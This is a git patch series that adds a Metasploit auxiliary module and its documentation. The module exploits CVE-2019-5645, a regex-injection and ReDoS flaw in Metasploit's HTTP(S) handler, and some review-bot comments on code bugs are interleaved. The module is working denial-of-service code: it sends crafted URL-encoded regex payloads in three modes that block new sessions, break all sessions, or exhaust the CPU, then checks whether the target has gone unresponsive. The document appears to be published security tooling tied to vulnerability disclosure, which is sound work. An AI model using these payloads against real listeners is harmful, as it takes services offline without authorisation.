From d65775e5bf5cb5df93d753d3e2ea684235cc90a0 Mon Sep 17 00:00:00 2001
From: Jose Garduno
Date: Wed, 9 Oct 2019 16:54:43 +0200
Subject: [PATCH 1/5] added metasploit http DoS module
---
 .../dos/http/metasploit_httphandler_dos.rb | 152 ++++++++++++++++++
 1 file changed, 152 insertions(+)
 create mode 100644 modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
diff --git a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
new file mode 100644
index 000000000000..3fec42cadc1a
--- /dev/null
+++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
@@ -0,0 +1,152 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Dos
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Metasploit HTTP(S) handler DoS',
+ 'Description' => %q{
+ This module exploits the Metasploit HTTP(S) handler by sending
+ a specially crafted HTTP request that gets added as a resource handler.
+ Resources (which come from the external connections) are evaluated as RegEx
+ in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.
+
+ GENTLE: *Current sessions will continue to work, but not future ones*
+ A lack of input sanitation permits an attacker to submit a
+ request that will be added to the resources and will be used as regex rule
+ it is possible then to make a valid regex rule that captures all the new handler
+ requests. The sessions that were established previously will continue to work.
+
+ SOFT: *No past or future sessions will work*
+ A lack of input sanitation and lack of exception handling causes
+ metasploit to behave abnormally when looking an appropriate resource for the
+ request, by submitting an invalid regex as a resource. This means that no request,
+ current or future will get served an answer.
+
+ HARD: *ReDOS or Catastrophic Regex Backtracking*
+ A lack of input sanitization on paths added as resources allows
+ an attacker to execute a catastrophic regex backtracking operation
+ causing a Denial of Service by CPU consumption.
+
+ Tested against:
+
+ Metasploit 5.0.20
+ },
+ 'Author' => [
+ 'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module.
+ 'Angelo Seiler, Dreamlab Technologies AG', #Additional research, debugging.
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['CVE', '2019-5645']
+ ],
+ 'DisclosureDate' => '04 September 2019'
+ ))
+
+ register_options(
+ [
+ OptString.new('DOSTYPE', [true, 'GENTLE|SOFT|HARD', 'HARD'])
+ ])
+ end
+
+ def test_service_unresponsive
+ begin
+ print_status('Testing for service unresponsiveness.')
+
+ res = send_request_cgi({
+ 'uri' => '/' + Rex::Text.rand_text_alpha(8),
+ 'method' => 'GET'
+ })
+
+ if res.nil?
+ print_good('SUCCESS, Service not responding.')
+ else
+ print_error('Service responded with a valid HTTP Response; Attack failed.')
+ end
+ rescue ::Rex::ConnectionRefused
+ print_error('An unknown error occurred.')
+ rescue ::Timeout::Error
+ print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
+ end
+ end
+
+
+ def dos
+ case datastore['DOSTYPE']
+ when "HARD"
+ resone = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri("/%2f%26%28%21%7c%23%2b%29%2b%40%32%30")
+ )
+ begin
+ restwo = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri("/%26%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%21")
+ )
+ rescue ::Errno::EPIPE, ::Timeout::Error
+ # Same exceptions the HttpClient mixin catches
+ end
+ test_service_unresponsive
+
+ when "SOFT"
+ resone = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri("/%5b20")
+ )
+
+ test_service_unresponsive
+
+ when "GENTLE"
+ resone = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri("/%2e%2a%7c%32%30%7c%5c")
+ )
+
+ sleep(1)
+
+ restwo = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri("/whatever")
+ )
+
+ resthree = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri("/whatever2")
+ )
+
+ if resthree.body.length == 0
+ print_good('SUCCESS, Service not responding.')
+ else
+ print_error('Service responded with a valid HTTP Response; Attack failed.')
+ end
+
+ else
+ bla = ""
+ end
+
+ print_status("DOS request sent")
+ end
+
+ def is_alive?
+ begin
+ connect
+ rescue Rex::ConnectionRefused
+ return false
+ ensure
+ disconnect
+ end
+ true
+ end
+
+ def run
+ print_status("#{rhost}:#{rport} - Sending DoS packet...")
+ dos
+
+ end
+
+end
\ No newline at end of file
From 8576a7876ad6a111550588b54cb58ab96e34eb33 Mon Sep 17 00:00:00 2001
From: p0
Date: Wed, 9 Oct 2019 21:53:47 +0200
Subject: [PATCH 2/5] changed disclosure date to ISO 8601 format
---
 modules/auxiliary/dos/http/metasploit_httphandler_dos.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
index 3fec42cadc1a..f5a6a91d8774 100644
--- a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
+++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
@@ -45,7 +45,7 @@ def initialize(info = {})
 'References' => [
 ['CVE', '2019-5645']
 ],
- 'DisclosureDate' => '04 September 2019'
+ 'DisclosureDate' => '2019-09-04'
 ))

 register_options(
@@ -149,4 +149,4 @@ def run

 end

-end
\ No newline at end of file
+end
From 3dac95ed32c19db164663b52953e25b5287a597f Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 26 Dec 2019 13:00:52 -0600
Subject: [PATCH 3/5] fix enumeration handling
---
 modules/auxiliary/dos/http/metasploit_httphandler_dos.rb | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
index f5a6a91d8774..0a4a67cd898d 100644
--- a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
+++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
@@ -50,7 +50,7 @@ def initialize(info = {})

 register_options(
 [
- OptString.new('DOSTYPE', [true, 'GENTLE|SOFT|HARD', 'HARD'])
+ OptEnum.new('DOSTYPE', [true, 'Type of DoS to trigger', 'HARD', %w[GENTLE SOFT HARD]])
 ])
 end

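Review bot: In the GENTLE branch of `dos`, `resthree.body.length == 0` is evaluated without a nil check, although `send_request_cgi` returns nil when no response arrives — the very case `test_service_unresponsive` treats as success via `res.nil?` — so this branch raises NoMethodError exactly when it should report success. Use `if resthree.nil? || resthree.body.empty?`, or call `test_service_unresponsive` here as the HARD and SOFT branches do. In `test_service_unresponsive`, `rescue ::Rex::ConnectionRefused` prints `'An unknown error occurred.'`, which mislabels a known condition; `print_error('Connection refused; is the target listener up?')` would be accurate. `is_alive?` is defined but never called, and `resone`/`restwo` are assigned but unused.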
@@ -126,7 +126,7 @@ def dos
 end

 else
- bla = ""
+ fail_with Failure::BadConfig, 'Invalid DOSTYPE selected'
 end

 print_status("DOS request sent")
@@ -146,7 +146,6 @@ def is_alive?
 def run
 print_status("#{rhost}:#{rport} - Sending DoS packet...")
 dos
-
 end

 end
From b177a8235ddb36bef3da16c2596166502444905b Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 26 Dec 2019 13:05:21 -0600
Subject: [PATCH 4/5] adjust indentation
---
 .../dos/http/metasploit_httphandler_dos.rb | 24 +++++++++----------
 1 file changed, 12 insertions(+), 12 deletions(-)
diff --git a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
index 0a4a67cd898d..ce4f2496c5f5 100644
--- a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
+++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
@@ -9,8 +9,8 @@ class MetasploitModule < Msf::Auxiliary

 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'Metasploit HTTP(S) handler DoS',
- 'Description' => %q{
+ 'Name' => 'Metasploit HTTP(S) handler DoS',
+ 'Description' => %q{
 This module exploits the Metasploit HTTP(S) handler by sending
 a specially crafted HTTP request that gets added as a resource handler.
 Resources (which come from the external connections) are evaluated as RegEx
@@ -37,16 +37,16 @@ def initialize(info = {})

 Metasploit 5.0.20
 },
- 'Author' => [
- 'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module.
- 'Angelo Seiler, Dreamlab Technologies AG', #Additional research, debugging.
- ],
- 'License' => MSF_LICENSE,
- 'References' => [
- ['CVE', '2019-5645']
- ],
- 'DisclosureDate' => '2019-09-04'
- ))
+ 'Author' => [
+ 'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module.
+ 'Angelo Seiler, Dreamlab Technologies AG', #Additional research, debugging.
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['CVE', '2019-5645']
+ ],
+ 'DisclosureDate' => '2019-09-04'
+ ))

 register_options(
 [
From d87f752591c710cd30527d851788f7d196c3904c Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Thu, 26 Dec 2019 13:31:38 -0600
Subject: [PATCH 5/5] add module docs
---
 .../dos/http/metasploit_httphandler_dos.md | 36 +++++++++++++++++++
 .../dos/http/metasploit_httphandler_dos.rb | 21 +----------
 2 files changed, 37 insertions(+), 20 deletions(-)
 create mode 100644 documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md
diff --git a/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md b/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md
new file mode 100644
index 000000000000..8f44caf777af
--- /dev/null
+++ b/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md
@@ -0,0 +1,36 @@
+## Vulnerable Application
+
+ Metasploit Framework before version 5.0.28
+
+## Verification Steps
+
+ 1. Install Metasploit 5.0.27 or earlier (or checkout before commit 5621d200ccf62e4a8f0dad80c1c74f4e0e52d86b)
+ 2. Start msfconsole with the target Metasploit instance and start any reverse_http/reverse_https listener
+ 3. Start this module and set RHOSTS and RPORT to the target listener address and port.
+ 4. Run the modulest ```
+ 7. `msfconsole` should use 99%+ CPU for a varying amount of time depending on the DOSTYPE option. You may need to kill the process manually.
+
+## Options
+
+ **DOSTYPE**
+
+ GENTLE: *Current sessions will continue to work, but not future ones*
+ A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
+
+ SOFT: *No past or future sessions will work*
+ A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
+
+ HARD: *ReDOS or Catastrophic Regex Backtracking*
+ A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
+
+## Scenarios
+
+```
+msf5 auxiliary(dos/http/metasploit_httphandler_dos) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:8080 - Sending DoS packet...
+^C[-] Stopping running againest current target...
+[*] Control-C again to force quit all targets.
+[*] Auxiliary module execution completed
+```
diff --git a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
index ce4f2496c5f5..88dc90926703 100644
--- a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
+++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
@@ -16,26 +16,7 @@ def initialize(info = {})
 Resources (which come from the external connections) are evaluated as RegEx
 in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.

- GENTLE: *Current sessions will continue to work, but not future ones*
- A lack of input sanitation permits an attacker to submit a
- request that will be added to the resources and will be used as regex rule
- it is possible then to make a valid regex rule that captures all the new handler
- requests. The sessions that were established previously will continue to work.
-
- SOFT: *No past or future sessions will work*
- A lack of input sanitation and lack of exception handling causes
- metasploit to behave abnormally when looking an appropriate resource for the
- request, by submitting an invalid regex as a resource. This means that no request,
- current or future will get served an answer.
-
- HARD: *ReDOS or Catastrophic Regex Backtracking*
- A lack of input sanitization on paths added as resources allows
- an attacker to execute a catastrophic regex backtracking operation
- causing a Denial of Service by CPU consumption.
-
- Tested against:
-
- Metasploit 5.0.20
+ Tested against Metasploit 5.0.20.
 },
 'Author' => [
 'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module.
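Review bot: With the per-mode explanation removed from `Description`, the only in-module help for the DOSTYPE option is the `OptEnum` string `'Type of DoS to trigger'` in `register_options` (outside this hunk), so an operator reading `show options` no longer learns what GENTLE, SOFT and HARD mean for the target. Consider carrying the one-line summaries into that string, e.g. `'Type of DoS to trigger (GENTLE: new sessions blocked, SOFT: all sessions blocked, HARD: CPU exhaustion)'`, since the markdown file is not shown inside msfconsole. The enclosing `initialize` starts and ends outside this hunk.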